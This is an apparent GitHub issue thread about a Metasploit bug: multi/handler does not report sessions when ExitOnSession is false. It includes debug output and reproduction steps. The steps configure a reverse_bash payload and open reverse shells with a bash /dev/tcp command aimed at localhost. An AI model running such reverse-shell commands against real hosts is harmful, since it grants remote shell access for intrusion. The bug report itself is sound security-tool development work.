Open WangYihang opened 6 years ago
In addition:
After debugging I noticed that only when ExitOnSession is set to false, the return value of function exploit_simple (lib/msf/base/simple/exploit.rb:59) will be nil.
Debug log
[*] Command shell session 2 opened (127.0.0.1:4444 -> 127.0.0.1:42402) at 2018-05-31 10:05:45 +0800
[*] Command shell session 3 opened (127.0.0.1:4444 -> 127.0.0.1:42404) at 2018-05-31 10:05:54 +0800
^C[-] Exploit failed: Interrupt
"[Debug]: Exploit finished! Session: "
From: /home/sun/Desktop/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb @ line 123 Msf::Ui::Console::CommandDispatcher::Exploit#cmd_exploit:
118: 'OptionStr' => opt_str,
119: 'LocalInput' => driver.input,
120: 'LocalOutput' => driver.output,
121: 'RunAsJob' => jobify)
122: p "[Debug]: Exploit finished! Session: #{session}"
=> 123: binding.pry
124: rescue ::Interrupt
125: raise $!
126: rescue ::Exception => e
127: print_error("Exploit exception (#{mod.refname}): #{e.class} #{e}")
128: if(e.class.to_s != 'Msf::OptionValidateError')
[1] pry(#<Msf::Ui::Console::CommandDispatcher::Exploit>)> session
=> nil
This module is not a real exploit, and as such, has no actual success criteria. But we could probably fake it.
Thank you for the reply~ I know that it is not a real exploit, but the session is actually created... so in my mind, the framework should tell the user that N sessions were created while listening on the port~
Here is my thinking: I think we can just send a specific command (such as: echo '#{random_string}') which can run on multiple platforms (it seems like the function run_cmd_token), then if the client echoes that string, we can find that the exploit is successful...
I am not sure whether it will work or not...
Hi!
This issue has been left open with no activity for a while now.
We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!
As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
Steps to reproduce
I found this problem while working on my GSoC project, and I will try to fix it as best I can. Here are the steps to reproduce:
./msfconsole
use multi/handler
set payload cmd/unix/reverse_bash;
set LHOST 127.0.0.1;
set LPORT 4444;
set ExitOnSession false;
exploit
Open two terminals and create two reverse shell sessions
bash -c 'bash -i >&/dev/tcp/127.0.0.1/4444 2>&1 0>&1'
bash -c 'bash -i >&/dev/tcp/127.0.0.1/4444 2>&1 0>&1'
Expected behavior
Current behavior
Difference between expected behavior and current behavior is marked by stars (***********)
System stuff
Metasploit version
I installed Metasploit with:
OS
Ubuntu 18.10